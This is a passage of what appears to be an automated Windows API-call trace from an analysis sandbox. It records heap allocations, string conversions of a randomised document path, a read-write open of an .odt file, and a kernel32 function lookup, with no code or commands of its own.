hHeap=0x8a0000) returned 1 [0178.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0178.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0178.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0178.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0178.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0178.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0178.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0178.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0178.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0178.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0178.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0178.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt", cchWideChar=89, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 89 [0178.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x59) returned 0x9a5d78 [0178.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt", cchWideChar=89, lpMultiByteStr=0x9a5d78, cbMultiByte=89, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt", lpUsedDefaultChar=0x0) returned 89 [0178.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0178.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0178.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0178.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0178.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0178.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0178.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0178.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0178.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0178.859] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\orhlgisqmqrnaihm\\g4fthfjbwb6.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0178.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0178.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0178.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0178.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0178.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0178.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0178.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0178.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0178.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0178.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0178.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0178.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0178.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0178.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0178.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=89, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0178.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb2) returned 0x8fabc0 [0178.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=89, lpWideCharStr=0x8fabc0, cchWideChar=89 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt") returned 89 [0178.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0178.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3478 [0178.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fabc0 | out: hHeap=0x8a0000) returned 1 [0178.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0178.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0178.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0178.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0178.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0178.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0178.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0178.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0178.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0178.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0178.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0178.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0178.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0178.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0178.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0178.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0178.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0178.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0178.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0178.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0178.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0178.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0178.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0178.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0178.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0178.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0178.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0178.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0178.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0178.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0178.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0178.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0178.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0178.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0178.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0178.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0178.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0178.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0178.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0178.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0178.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0178.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0178.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0178.864] FreeLibrary (hLibModule=0x75990000) returned 1 [0178.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0178.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0178.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0178.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0178.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0178.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0178.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0178.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0178.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0178.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0178.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0178.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0178.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0178.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0178.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0178.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0178.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0178.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0178.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0178.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0178.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0178.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0178.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0178.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0178.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0178.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0178.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0178.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0178.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0178.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0178.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0178.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0178.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0178.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0178.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0178.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0178.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0178.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0178.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0178.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0178.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0178.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0178.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0178.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0178.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0178.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0178.865] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0178.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0178.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0178.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0178.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0178.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0178.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0178.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0178.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0178.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0178.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0178.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0178.866] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0178.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0178.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0178.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0178.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0178.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0178.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0178.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0178.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0178.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0178.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0178.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0178.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0178.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0178.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0178.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0178.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0178.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0178.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0178.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0178.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0178.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0178.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0178.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0178.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0178.866] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0178.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0178.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0178.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0178.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0178.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0178.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0178.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0178.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0178.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0178.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0178.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0178.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0178.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0178.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0178.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0178.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0178.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0178.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0178.867] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0178.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0178.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0178.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0178.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9e38 [0178.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9b9e38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0178.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0178.868] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0178.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0178.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0178.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0178.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0178.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0178.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0178.868] CloseHandle (hObject=0x138) returned 1 [0178.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0178.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0178.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0178.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0178.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0178.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0178.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0178.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0178.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0178.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0178.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0178.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0178.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0178.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0178.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0178.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0178.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0178.868] FreeLibrary (hLibModule=0x75990000) returned 1 [0178.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 